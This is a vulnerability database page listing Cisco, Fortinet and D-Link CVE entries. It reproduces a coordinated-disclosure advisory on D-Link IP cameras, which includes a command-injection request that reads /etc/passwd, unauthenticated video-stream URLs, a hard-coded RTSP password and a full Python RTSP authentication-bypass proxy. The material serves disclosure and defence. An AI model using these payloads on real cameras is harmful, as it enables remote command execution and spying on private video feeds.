VARIoT IoT vulnerabilities database
| VAR-201305-0270 | CVE-2013-1160 | Cisco Prime Central for Hosted Collaboration Solution Vulnerable to cross-site scripting |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in the OpenView web menus in Cisco Prime Central for Hosted Collaboration Solution allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter, aka Bug ID CSCud56743.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
This issue is being tracked by Cisco Bug ID CSCud56743.
| VAR-201306-0360 | CVE-2013-4669 | FortiClient on multiple OSes: information disclosure vulnerability |
CVSS V2: 5.4 CVSS V3: - Severity: MEDIUM |
FortiClient before 4.3.5.472 on Windows, before 4.0.3.134 on Mac OS X, and before 4.0 on Android; FortiClient Lite before 4.3.4.461 on Windows; FortiClient Lite 2.0 through 2.0.0223 on Android; and FortiClient SSL VPN before 4.0.2258 on Linux proceed with an SSL session after determining that the server's X.509 certificate is invalid, which allows man-in-the-middle attackers to obtain sensitive information by leveraging a password transmission that occurs before the user warning about the certificate problem. Fortinet FortiClient VPN client is prone to a security-bypass vulnerability because the application fails to properly validate SSL certificates from the server.
An attacker can exploit this issue to perform man-in-the-middle attacks or impersonate trusted servers, which will aid in further attacks. Because the password is transmitted before the user is warned about the certificate, the warning cannot protect the credential; the client has to abort the session when validation fails. Fortinet FortiClient, FortiClient Lite and FortiClient SSL VPN are all products of Fortinet. FortiClient is a suite of endpoint security software providing features such as IPsec and SSL encryption, WAN optimization, endpoint compliance and two-factor authentication. FortiClient Lite is free antivirus software offering malware detection, real-time protection, parental controls, web filtering and more. FortiClient SSL VPN is the VPN component integrated into FortiClient products. The following versions are affected: FortiClient before 4.3.5.472 on Windows, before 4.0.3.134 on Mac OS X and before 4.0 on Android; FortiClient Lite before 4.3.4.461 on Windows and 2.0 through 2.0.0223 on Android; and FortiClient SSL VPN before 4.0.2258 on Linux.
| VAR-201305-0164 | CVE-2013-1234 | Cisco IOS XR SNMP module denial of service (DoS) vulnerability |
CVSS V2: 4.0 CVSS V3: - Severity: MEDIUM |
The SNMP module in Cisco IOS XR allows remote authenticated users to cause a denial of service (process restart) via crafted SNMP packets, aka Bug ID CSCue69472. Cisco IOS is a popular Internet operating system. Cisco IOS XR is prone to a remote denial-of-service vulnerability.
Successfully exploiting this issue may allow an attacker to cause a denial of service condition.
This issue is being tracked by Cisco Bug ID CSCue69472.
Cisco IOS XR 4.3 and prior versions are vulnerable.
| VAR-201305-0271 | CVE-2013-1156 | Cisco Prime Central for Hosted Collaboration Solution Vulnerable to directory traversal |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Directory traversal vulnerability in Cisco Prime Central for Hosted Collaboration Solution allows remote attackers to read arbitrary files via a crafted URL, aka Bug ID CSCud51034.
Remote attackers can use specially crafted requests with directory-traversal sequences ('../') to retrieve arbitrary files in the context of the application. This may aid in further attacks.
This issue is being tracked by Cisco Bug ID CSCud51034.
| VAR-201305-0273 | CVE-2013-1158 | Cisco Prime Central for Hosted Collaboration Solution Vulnerable to cross-site scripting |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in the IBM Tivoli Monitoring (ITM) help menus in Cisco Prime Central for Hosted Collaboration Solution allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter, aka Bug ID CSCud54397. The vendor has confirmed this vulnerability and tracks it as Bug ID CSCud54397. Any third party may inject web script or HTML through unspecified parameters.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
This issue is being tracked by Cisco Bug ID CSCud54397. IBM Tivoli Monitoring (ITM) is a set of system monitoring software developed by IBM Corporation in the United States. The software supports detection of system bottlenecks and potential problems, performance monitoring of essential system resources, automatic recovery from critical situations, and more
| VAR-201305-0269 | CVE-2013-1159 | Cisco Prime Central for Hosted Collaboration Solution Vulnerable to cross-site scripting |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in the Netcool Impact (NCI) web menus in Cisco Prime Central for Hosted Collaboration Solution allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter, aka Bug ID CSCud56706.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
This issue is being tracked by Cisco Bug ID CSCud56706. Cisco Prime is a service-centric network management solution from Cisco that integrates the management of wired and wireless LANs, WANs and data centers, from endpoints through network devices to applications.
| VAR-201305-0161 | CVE-2013-1230 | Cisco Unified Communications Domain Manager denial of service (DoS) vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Cisco Unified Communications Domain Manager allows remote attackers to cause a denial of service (CPU consumption) via a flood of malformed UDP packets, aka Bug ID CSCug47057.
Attackers can exploit this issue to cause the device to consume excessive CPU resources, resulting in denial-of-service conditions.
This issue is being tracked by Cisco Bug ID CSCug47057. The product provides a scalable, distributed and highly available enterprise IP telephony call-processing solution.
| VAR-202001-0839 | CVE-2013-1599 |
Multiple D-Link IP camera products: OS command injection vulnerability
Related entries in the VARIoT exploits database: VAR-E-201304-0137 |
CVSS V2: 10.0 CVSS V3: 9.8 Severity: CRITICAL |
A Command Injection vulnerability exists in the /var/www/cgi-bin/rtpd.cgi script in D-Link IP Cameras DCS-3411/3430 firmware 1.02, DCS-5605/5635 1.01, DCS-1100L/1130L 1.04, DCS-1100/1130 1.03, DCS-1100/1130 1.04_US, DCS-2102/2121 1.05_RU, DCS-3410 1.02, DCS-5230 1.02, DCS-5230L 1.02, DCS-6410 1.00, DCS-7410 1.00, DCS-7510 1.00, and WCS-1100 1.02, which could let a remote malicious user execute arbitrary commands through the camera's web interface. Multiple D-Link IP camera products contain an OS command injection vulnerability; an attacker may obtain information, tamper with information or cause a denial of service (DoS). The script '/var/www/cgi-bin/rtpd.cgi' fails to validate its input, so a remote attacker can submit a request such as http://192.168.1.100/cgi-bin/rtpd.cgi?uname&-a;cat&/etc/passwd to execute arbitrary commands in the context of the application.
Exploiting this issue could allow an attacker to execute arbitrary commands in the context of the affected device.
1. *Advisory Information*
Title: D-Link IP Cameras Multiple Vulnerabilities
Advisory ID: CORE-2013-0303
Advisory URL:
http://www.coresecurity.com/advisories/d-link-ip-cameras-multiple-vulnerabilities
Date published: 2013-04-29
Date of last update: 2013-03-29
Vendors contacted: D-Link Corporation
Release mode: Coordinated release
2. *Vulnerability Information*
Class: OS command injection [CWE-78], Authentication issues [CWE-287],
Information leak through GET request [CWE-598], Authentication issues
[CWE-287], Use of hard-coded credentials [CWE-798]
Impact: Code execution, Security bypass
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2013-1599, CVE-2013-1600, CVE-2013-1601, CVE-2013-1602,
CVE-2013-1603
3. *Vulnerability Description*
Multiple vulnerabilities have been found in D-Link IP cameras [1] that
could allow an unauthenticated remote attacker:
1. [CVE-2013-1599] to execute arbitrary commands from the
administration web interface,
2. [CVE-2013-1600] to access the video stream via HTTP,
3. [CVE-2013-1601] to access the ASCII video stream via image luminance,
4. [CVE-2013-1602] to access the video stream via RTSP,
5. [CVE-2013-1603] to bypass RTSP authentication using hard-coded
credentials.
4. *Vulnerable Packages*
The following is the list of affected devices and the associated
firmware (confirmed by D-Link). Other SKUs are probably affected too,
but they were not checked.
[CVE-2013-1599]
. DCS-3411/3430 - firmware v1.02
. DCS-5605/5635 - v1.01
. DCS-1100L/1130L - v1.04
. DCS-1100/1130 - v1.03
. DCS-1100/1130 - v1.04_US
. DCS-2102/2121 - v1.05_RU
. DCS-3410 - v1.02
. DCS-5230 - v1.02
. DCS-5230L - v1.02
. DCS-6410 - v1.00
. DCS-7410 - v1.00
. DCS-7510 - v1.00
. WCS-1100 - v1.02
[CVE-2013-1600]
. DCS-2102/2121 - v1.05_RU
. DCS-2102/2121 - v1.06
. DCS-2102/2121 - v1.06_FR
. TESCO DCS-2102/2121 - v1.05_TESCO
[CVE-2013-1601] and [CVE-2013-1603]
. DCS-3411/3430 - v1.02
. DCS-5605/5635 - v1.01
. DCS-1100L/1130L - v1.04
. DCS-1100/1130 - v1.03
. DCS-1100/1130 - v1.04_US
. DCS-2102/2121 - v1.05_RU
. DCS-2102/2121 - v1.06
. DCS-2102/2121 - v1.06_FR
. TESCO DCS-2102/2121 - v1.05_TESCO
. DCS-3410 - v1.02
. DCS-5230 - v1.02
. DCS-5230L - v1.02
. DCS-6410 - v1.00
. DCS-7410 - v1.00
. DCS-7510 - v1.00
. WCS-1100 - v1.02
[CVE-2013-1602]
. ALL mentioned devices and firmware.
5. *Vendor Information, Solutions and Workarounds*
D-Link announces that all patches are ready and scheduled for posting on
corporate web site for all customers [2013-04-25]. Contact D-Link for
further information.
6. *Credits*
[CVE-2013-1599], [CVE-2013-1600] and [CVE-2013-1601] were discovered and
researched by Francisco Falcon and Nahuel Riva from Core Exploit Writers
Team.
[CVE-2013-1602] was discovered and researched by Martin Rocha from Core
Impact Pro Team. The PoC was made by Martin Rocha with help of Juan
Cotta from Core QA Team.
[CVE-2013-1603] was discovered and researched by Pablo Santamaria from
Core Security Consulting Services.
The publication of this advisory was coordinated by Fernando Miranda
from Core Advisories Team.
7. *Technical Description / Proof of Concept Code*
7.1. *OS Command Injection*
[CVE-2013-1599] A security issue located in '/var/www/cgi-bin/rtpd.cgi'
allows an unauthenticated remote attacker to execute arbitrary commands
through the camera's web interface. The OS command injection is due to
this code in 'rtpd.cgi':
/-----
echo "$QUERY_STRING" | grep -vq ' ' || die "query string cannot contain spaces."
. $conf > /dev/null 2> /dev/null
eval "$(echo $QUERY_STRING | sed -e 's/&/ /g')"
-----/
The first line of this snippet only ensures that there are no spaces in
'$QUERY_STRING'. The last line uses 'sed' to replace ampersands '&' with
spaces and then hands the result to the shell builtin 'eval', which
executes it as a command line. The attacker simply writes '&' wherever a
space is needed, so the space check is defeated, and every other shell
metacharacter (';', '|', '$(...)') in the query string is interpreted.
The CGI is reachable without authentication, so this is unauthenticated
remote command execution. For example, in order to execute:
/-----
uname -a;cat /etc/passwd
-----/
the following request can be sent to the camera web interface:
/-----
http://192.168.1.100/cgi-bin/rtpd.cgi?uname&-a;cat&/etc/passwd
-----/
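As an added example (not part of the Core advisory or of D-Link's firmware), the POSIX shell script below reproduces the three vulnerable lines of 'rtpd.cgi' inside a function so the bypass can be exercised offline, and places a hardened query-string parser next to it. The 'die' helper is replaced by an inline error return; the parameter names 'port' and 'codec' and the accepted value character set are assumptions chosen for illustration, since the real rtpd.cgi parameter names are not given on this page.

```shell
#!/bin/sh
# Added example: the rtpd.cgi pattern next to a hardened parser.
# Not the firmware's code; 'die' is replaced by an inline error return.

# Vulnerable: mirrors the three lines quoted from rtpd.cgi. The space check
# runs first and the '&' -> ' ' substitution runs afterwards, so a query
# string like 'uname&-a;cat&/etc/passwd' passes the check and 'eval' then
# executes "uname -a;cat /etc/passwd" as a shell command line.
vulnerable_parse() {
    QUERY_STRING=$1
    echo "$QUERY_STRING" | grep -vq ' ' || {
        echo "query string cannot contain spaces." >&2
        return 1
    }
    eval "$(echo $QUERY_STRING | sed -e 's/&/ /g')"
}

# Hardened: never hand the query string to 'eval'. Split on '&' with IFS,
# accept only whitelisted keys and a conservative value charset, and assign
# through explicit case arms. Keys 'port' and 'codec' are assumptions.
safe_parse() {
    RTP_PORT=""
    RTP_CODEC=""
    _old_ifs=$IFS
    IFS='&'
    for pair in $1; do
        key=${pair%%=*}
        value=${pair#*=}
        if [ "$pair" = "$key" ]; then
            value=""                     # bare key without '='
        fi
        case $value in
            *[!A-Za-z0-9_.-]*)
                echo "rejected value for '$key'" >&2
                IFS=$_old_ifs
                return 1 ;;
        esac
        case $key in
            port)  RTP_PORT=$value ;;
            codec) RTP_CODEC=$value ;;
            *)
                echo "rejected unknown key '$key'" >&2
                IFS=$_old_ifs
                return 1 ;;
        esac
    done
    IFS=$_old_ifs
    return 0
}

# Usage (harmless payload, same shape as the advisory's):
#   vulnerable_parse 'echo&injected;echo&second'   # prints both words
#   safe_parse 'uname&-a;cat&/etc/passwd'          # rejected, nothing runs
```

The hardened parser rejects the advisory's payload at the first pair ('uname' is not a known key) and also rejects a well-formed key carrying a metacharacter such as 'port=5556;reboot', because the value check runs before any assignment.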
7.2. *Authentication Bypass*
[CVE-2013-1600] The live video stream can be accessed without
authentication by a remote attacker via the following request:
/-----
http://192.168.1.100/upnp/asf-mp4.asf
-----/
7.3. *ASCII Video Stream Information Leak*
[CVE-2013-1601] An ASCII output (the image luminance) of the live video
stream can be accessed by a remote unauthenticated attacker via:
/-----
http://192.168.1.100/md/lums.cgi
-----/
The following example is the output of a coffee pot video stream [2]:
/-----
O O O O O O O O O O O O O O O O O O O O O O O O O O o o o o o o o o o o o o
O O O O O O O O O O O O O O O O O O O O o o o O O O o o o o o o o o o o o o
O O O O O O O O O O O O O O O O O O . o O O o o o o o o o o o o o
O O O O O O O O O O O O o o O O o . o o o o o o o o o o o o o o
O O O O O O O O O O O O o o o o . o o o o o o o
O O O O O O O O O O o . o O O o . o o o o o o
O O O O O O O O O . o o o o o o
O O O O O O O O . o o o o o o o o
O O O O O O O . o O O o . o o o o o o o o o
O O O O O O o . O O O O O O . o o o o o o o o o
O O O O O O . O O O O O O O . o o o o o o o o o
O O O O O O o O O O O O O O . o . o o o o o o o o
O O O O O O o O O O O O O O . o o o . o o o o o o o o
O O O O O O o O O O O O O o . o O O o O O . o o o o o o o
O O O O O O . o O O O O O O o . O O O o O O . o o o o o o
O O O O O O . O O O O O o . O O o o O O o . o o o o o o
O O O O O O o O O O O O o . o O O o o O O o . o o o o o
O O O O O O O O O O O O . o O O o o O O o . o o o o o
O O O O O O O . o O O O o . o o o O o o O O o . o o o o
O O O O O O O o . O O O o . o o o O o o O O o . o o o o
O O O O O O O O . O O O . o o o O o o O O o . o o o o
O O O O O O O O O O O . o o o O o o O O o . o o o
O O O O O O O O o o O o o o o o O o o o O o . o o o
O O O O O O O O O . O o o o o o O o . o O o . o o
O O O O O O O O O . O o . o o o o O . o O o . o
O O O O O O O O O o o . o o o o o . o O o . o
O O O O O O O O O O . o o o . o . o O o .
o O O O O O O O O O . o o o . o . O o .
o o O O O O O O O O o . o o o . o . O o .
o o o O O O O O O O o . o o o . o . O o .
-----/
7.4. *RTSP Authentication Bypass*
[CVE-2013-1602] This vulnerability is triggered because:
1. Authentication is only present in DESCRIBE requests but not in
every subsequent request.
2. When the RTSP session is being established, the authentication
request of current session is ignored (a previously stored response is
used instead).
As a result, the video stream can be accessed by an unauthenticated
remote attacker.
/-----
# RTSP authentication bypass PoC (CVE-2013-1602). Python 2 code as published
# in the advisory; line breaks introduced by extraction have been rejoined and
# comments added. It runs as a TCP proxy between an RTSP client and the camera,
# replaces the camera's "401 Unauthorized" reply to DESCRIBE with a canned
# "200 OK" plus SDP body, and relays the RTP/RTCP UDP ports the camera announces.
import sys
from socket import *
from threading import Thread
import time, re

LOGGING = 1

def log(s):
    if LOGGING:
        print '(%s) %s' % (time.ctime(), s)

class UDPRequestHandler(Thread):
    # Forwards one UDP datagram to the camera and relays the reply back
    def __init__(self, data_to_send, recv_addr, dst_addr):
        Thread.__init__(self)
        self.data_to_send = data_to_send
        self.recv_addr = recv_addr
        self.dst_addr = dst_addr

    def run(self):
        sender = socket(AF_INET, SOCK_DGRAM)
        sender.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
        sender.sendto(self.data_to_send, self.dst_addr)
        response = sender.recv(1024)
        sender.sendto(response, self.recv_addr)
        sender.close()

class UDPDispatcher(Thread):
    # One UDP listener per RTP/RTCP port announced by the camera
    dispatchers = []

    def __has_dispatcher_for(self, port):
        return any([d.src_port == port for d in UDPDispatcher.dispatchers])

    def __init__(self, src_port, dst_addr):
        Thread.__init__(self)
        if self.__has_dispatcher_for(src_port):
            raise Exception('There is already a dispatcher for port %d' % src_port)
        self.src_port = src_port
        self.dst_addr = dst_addr
        UDPDispatcher.dispatchers.append(self)

    def run(self):
        listener = socket(AF_INET, SOCK_DGRAM)
        listener.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
        listener.bind(('', self.src_port))
        while 1:
            try:
                data, recv_addr = listener.recvfrom(1024)
                if not data: break
                UDPRequestHandler(data, recv_addr, self.dst_addr).start()
            except Exception as e:
                print e
                break
        listener.close()
        UDPDispatcher.dispatchers.remove(self)

class PipeThread(Thread):
    # Copies data from source to sink, passing each chunk through a callback
    pipes = []

    def __init__(self, source, sink, process_data_callback=lambda x: x):
        Thread.__init__(self)
        self.source = source
        self.sink = sink
        self.process_data_callback = process_data_callback
        PipeThread.pipes.append(self)

    def run(self):
        while 1:
            try:
                data = self.source.recv(1024)
                data = self.process_data_callback(data)
                if not data: break
                self.sink.send(data)
            except Exception as e:
                log(e)
                break
        PipeThread.pipes.remove(self)

class TCPTunnel(Thread):
    # TCP proxy: every accepted client gets a forwarding socket to the camera
    def __init__(self, src_port, dst_addr, process_data_callback=lambda x: x):
        Thread.__init__(self)
        log('[*] Redirecting: localhost:%s -> %s:%s' % (src_port, dst_addr[0], dst_addr[1]))
        self.dst_addr = dst_addr
        self.process_data_callback = process_data_callback
        # Create TCP listener socket
        self.sock = socket(AF_INET, SOCK_STREAM)
        self.sock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
        self.sock.bind(('', src_port))
        self.sock.listen(5)

    def run(self):
        while 1:
            # Wait until a new connection arises
            newsock, address = self.sock.accept()
            # Create forwarder socket
            fwd = socket(AF_INET, SOCK_STREAM)
            fwd.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
            fwd.connect(self.dst_addr)
            # Pipe them!
            PipeThread(newsock, fwd, self.process_data_callback).start()
            PipeThread(fwd, newsock, self.process_data_callback).start()

class Camera():
    def __init__(self, address):
        self.address = address

    def get_describe_data(self):
        return ''

class DLink(Camera):
    # D-Link DCS-2102/1.06-5731
    def __init__(self, address):
        Camera.__init__(self, address)

    def get_describe_data(self):
        # Canned SDP body captured from a DCS-2102 (v=0 ... m=video 0 RTP/AVP 96
        # ... m=audio 0 RTP/AVP 0), served to the client in place of the
        # authenticated DESCRIBE response the camera refused to send
        return '\x76\x3d\x30\x0d\x0a\x6f\x3d\x43\x56\x2d\x52\x54\x53\x50\x48\x61\x6e\x64\x6c\x65\x72\x20\x31\x31\x32\x33\x34\x31\x32\x20\x30\x20\x49\x4e\x20\x49\x50\x34\x20\x31\x39\x32\x2e\x31\x36\x38\x2e\x32\x2e\x31\x31\x0d\x0a\x73\x3d\x44\x43\x53\x2d\x32\x31\x30\x32\x0d\x0a\x63\x3d\x49\x4e\x20\x49\x50\x34\x20\x30\x2e\x30\x2e\x30\x2e\x30\x0d\x0a\x74\x3d\x30\x20\x30\x0d\x0a\x61\x3d\x63\x68\x61\x72\x73\x65\x74\x3a\x53\x68\x69\x66\x74\x5f\x4a\x49\x53\x0d\x0a\x61\x3d\x72\x61\x6e\x67\x65\x3a\x6e\x70\x74\x3d\x6e\x6f\x77\x2d\x0d\x0a\x61\x3d\x63\x6f\x6e\x74\x72\x6f\x6c\x3a\x2a\x0d\x0a\x61\x3d\x65\x74\x61\x67\x3a\x31\x32\x33\x34\x35\x36\x37\x38\x39\x30\x0d\x0a\x6d\x3d\x76\x69\x64\x65\x6f\x20\x30\x20\x52\x54\x50\x2f\x41\x56\x50\x20\x39\x36\x0d\x0a\x62\x3d\x41\x53\x3a\x31\x38\x0d\x0a\x61\x3d\x72\x74\x70\x6d\x61\x70\x3a\x39\x36\x20\x4d\x50\x34\x56\x2d\x45\x53\x2f\x39\x30\x30\x30\x30\x0d\x0a\x61\x3d\x63\x6f\x6e\x74\x72\x6f\x6c\x3a\x74\x72\x61\x63\x6b\x49\x44\x3d\x31\x0d\x0a\x61\x3d\x66\x6d\x74\x70\x3a\x39\x36\x20\x70\x72\x6f\x66\x69\x6c\x65\x2d\x6c\x65\x76\x65\x6c\x2d\x69\x64\x3d\x31\x3b\x63\x6f\x6e\x66\x69\x67\x3d\x30\x30\x30\x30\x30\x31\x42\x30\x30\x31\x30\x30\x30\x30\x30\x31\x42\x35\x30\x39\x30\x30\x30\x30\x30\x31\x30\x30\x30\x30\x30\x30\x30\x31\x32\x30\x30\x30\x43\x34\x38\x38\x42\x41\x39\x38\x35\x31\x34\x30\x34\x33\x43\x31\x34\x34\x33\x46\x3b\x64\x65\x63\x6f\x64\x65\x5f\x62\x75\x66\x3d\x37\x36\x38\x30\x30\x0d\x0a\x61\x3d\x73\x65\x6e\x64\x6f\x6e\x6c\x79\x0d\x0a\x6d\x3d\x61\x75\x64\x69\x6f\x20\x30\x20\x52\x54\x50\x2f\x41\x56\x50\x20\x30\x0d\x0a\x61\x3d\x72\x74\x70\x6d\x61\x70\x3a\x30\x20\x50\x43\x4d\x55\x2f\x38\x30\x30\x30\x0d\x0a\x61\x3d\x63\x6f\x6e\x74\x72\x6f\x6c\x3a\x74\x72\x61\x63\x6b\x49\x44\x3d\x32\x0d\x0a\x61\x3d\x73\x65\x6e\x64\x6f\x6e\x6c\x79\x0d\x0a'

class RTSPAuthByPasser():
    DESCRIBE_REQ_HEADER = 'DESCRIBE rtsp://'
    UNAUTHORIZED_RESPONSE = 'RTSP/1.0 401 Unauthorized'
    SERVER_PORT_ARGUMENTS = 'server_port='
    DEFAULT_CSEQ = 1
    DEFAULT_SERVER_PORT_RANGE = '5556-5559'

    def __init__(self, local_port, camera):
        self.last_describe_req = ''
        self.camera = camera
        self.local_port = local_port

    def start(self):
        log('[!] Starting bypasser')
        TCPTunnel(self.local_port, self.camera.address, self.spoof_rtsp_conn).start()

    def spoof_rtsp_conn(self, data):
        # Called for every chunk in both directions of the RTSP TCP session
        if RTSPAuthByPasser.DESCRIBE_REQ_HEADER in data:
            # Client -> camera: remember the DESCRIBE so its CSeq can be echoed
            self.last_describe_req = data
        elif RTSPAuthByPasser.UNAUTHORIZED_RESPONSE in data and self.last_describe_req:
            # Camera -> client: swap the 401 for a forged 200 OK carrying the SDP
            log('[!] Unauthorized response received. Spoofing...')
            spoofed_describe = self.camera.get_describe_data()
            # Look for the request CSeq
            m = re.search('.*CSeq:\\s*(\\d+?)\r\n.*', self.last_describe_req)
            cseq = m.group(1) if m else RTSPAuthByPasser.DEFAULT_CSEQ
            # Create the response
            data = 'RTSP/1.0 200 OK\r\n'
            data+= 'CSeq: %s\r\n' % cseq
            data+= 'Content-Type: application/sdp\r\n'
            data+= 'Content-Length: %d\r\n' % len(spoofed_describe)
            data+= '\r\n'
            # Attach the spoofed describe
            data+= spoofed_describe
        elif RTSPAuthByPasser.SERVER_PORT_ARGUMENTS in data:
            # Camera -> client SETUP reply: relay the announced RTP/RTCP ports
            # Look for the server RTP ports
            m = re.search('.*%s\\s*(.+?)[;|\r].*' % RTSPAuthByPasser.SERVER_PORT_ARGUMENTS, data)
            ports = m.group(1) if m else RTSPAuthByPasser.DEFAULT_SERVER_PORT_RANGE
            # For each port in the range create a UDP dispatcher
            begin_port, end_port = map(int, ports.split('-'))
            for udp_port in xrange(begin_port, end_port + 1):
                try:
                    UDPDispatcher(udp_port, (self.camera.address[0], udp_port)).start()
                except:
                    pass
        return data

if __name__ == '__main__':
    if len(sys.argv) > 1:
        listener_port = camera_port = int(sys.argv[1])
        camera_ip = sys.argv[2]
        if len(sys.argv) == 4:
            camera_port = int(sys.argv[3])
        RTSPAuthByPasser(listener_port, DLink((camera_ip, camera_port))).start()
    else:
        print 'usage: python %s [local_port] [camera_ip] [camera_rtsp_port]' % sys.argv[0]
-----/
7.5. *RTSP Hard-Coded Credentials*
[CVE-2013-1603] RTSP service contains hard-coded credentials that
effectively serve as a backdoor, which allows remote attackers to access
the RTSP video stream.
/-----
username: (any)
password: ?*
-----/
As the following dump from the binary 'rtspd' shows, the pointer passed to
'strncmp' as s1 is computed as buffer + length - 3, so only the last three
characters of the concatenated 'username:password' string are compared
(n = 3) against the constant ':?*' (the character ':' is the separator
between username and password). Any username combined with the password
'?*' therefore satisfies the check:
/-----
.text:00011468 loc_11468 ; Load from Memory
.text:00011468 LDR R3, [R11,#s2]
.text:0001146C STR R3, [R11,#var_C0] ; Store to Memory
.text:00011470 LDR R2, [R11,#var_C0] ; Load from Memory
.text:00011474 LDR R3, [R11,#var_BC] ; Load from Memory
.text:00011478 ADD R3, R2, R3 ; Rd = Op1 + Op2
.text:0001147C SUB R3, R3, #3 ; Rd = Op1 - Op2
.text:00011480 STR R3, [R11,#var_C0] ; Store to Memory
.text:00011484 LDR R0, [R11,#var_C0] ; s1
.text:00011488 LDR R1, =asc_1B060 ; ":?*" <-------
.text:0001148C MOV R2, #3 ; n
.text:00011490 BL strncmp ; Branch with Link
.text:00011494 MOV R3, R0 ; Rd = Op2
.text:00011498 CMP R3, #0 ; Set cond. codes on Op1 - Op2
.text:0001149C BNE loc_114BC ; Branch
-----/
8. *Report Timeline*
. 2013-03-19: Core Security Technologies notifies the D-Link team of the vulnerability.
. 2013-03-20: D-Link team asks for a technical description of the vulnerability.
. 2013-03-20: Core sends a draft advisory with technical details and sets the estimated publication date of the advisory for May 14th, 2013.
. 2013-03-20: Vendor notifies that D-Link Corporation has an unpublished bounty program for security advisors. The bounty program requires both Core Security and D-Link to sign a memo of understanding (MoU).
. 2013-03-25: Core notifies that receiving money from vendors may bias the view of the report and rejects the bounty program.
. 2013-03-29: Vendor notifies that they hope to close the fix ASAP.
. 2013-04-08: Vendor sends the list of vulnerable devices and the associated firmware and notifies that they will release patches and release notes on the D-Link support forum first. Then, an official public release will be announced (approx. 1 month from forum post to full release).
. 2013-04-24: Core asks for a clarification regarding the D-Link release date and notifies that releasing fixes to a privileged closed group and/or a closed forum or list is unacceptable.
. 2013-04-25: Vendor notifies that the patches are ready and scheduled for posting on D-Link web site over the next few days.
. 2013-04-26: Core notifies that the advisory is re-scheduled for Monday 29th.
. 2013-04-29: Advisory CORE-2013-0303 published.
9. *References*
[1] http://www.dlink.com/us/en/home-solutions/view/network-cameras.
[2]
http://corelabs.coresecurity.com/themes/sample_theme/images/coffee-pot.png.
10. *About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com.
11. *About Core Security Technologies*
Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and demonstrate real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.
12. *Disclaimer*
The contents of this advisory are copyright (c) 2013 Core Security
Technologies and (c) 2013 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
13. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc
| VAR-202001-0842 | CVE-2013-1602 |
Multiple D-Link products: information disclosure vulnerability
Related entries in the VARIoT exploits database: VAR-E-201304-0137 |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
An Information Disclosure vulnerability exists due to insufficient validation of authentication cookies for the RTSP session in D-Link DCS-5635 1.01, DCS-1100L 1.04, DCS-1130L 1.04, DCS-1100 1.03/1.04_US, DCS-1130 1.03/1.04_US, DCS-2102 1.05_RU/1.06/1.06_FR/1.05_TESCO, DCS-2121 1.05_RU/1.06/1.06_FR/1.05_TESCO, DCS-3410 1.02, DCS-5230 1.02, DCS-5230L 1.02, DCS-6410 1.0, DCS-7410 1.0, DCS-7510 1.0, and WCS-1100 1.02, which could let a malicious user obtain unauthorized access to video streams. Multiple D-Link products contain an information disclosure vulnerability through which an attacker may obtain information. Multiple D-Link webcam products are affected.
Exploiting this issue could allow an unauthenticated attacker to gain access to potentially sensitive information, such as a video stream.
1. *Advisory Information*
Title: D-Link IP Cameras Multiple Vulnerabilities
Advisory ID: CORE-2013-0303
Advisory URL:
http://www.coresecurity.com/advisories/d-link-ip-cameras-multiple-vulnerabilities
Date published: 2013-04-29
Date of last update: 2013-03-29
Vendors contacted: D-Link Corporation
Release mode: Coordinated release
2. *Vulnerability Information*
Class: OS command injection [CWE-78], Authentication issues [CWE-287],
Information leak through GET request [CWE-598], Authentication issues
[CWE-287], Use of hard-coded credentials [CWE-798]
Impact: Code execution, Security bypass
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2013-1599, CVE-2013-1600, CVE-2013-1601, CVE-2013-1602,
CVE-2013-1603
3. *Vulnerability Description*
Multiple vulnerabilities have been found in D-Link IP cameras [1] that
could allow an unauthenticated remote attacker:
1. [CVE-2013-1599] to execute arbitrary commands from the
administration web interface,
2. [CVE-2013-1600] to access the video stream via HTTP,
3. [CVE-2013-1601] to access the ASCII video stream via image luminance,
4. [CVE-2013-1602] to access the video stream via RTSP,
5. [CVE-2013-1603] to bypass RTSP authentication using hard-coded
credentials.
4. *Vulnerable Packages*
The following is the list of affected devices and the associated
firmware (confirmed by D-Link). Other SKUs are probably affected too,
but they were not checked.
[CVE-2013-1599]
. DCS-3411/3430 - firmware v1.02
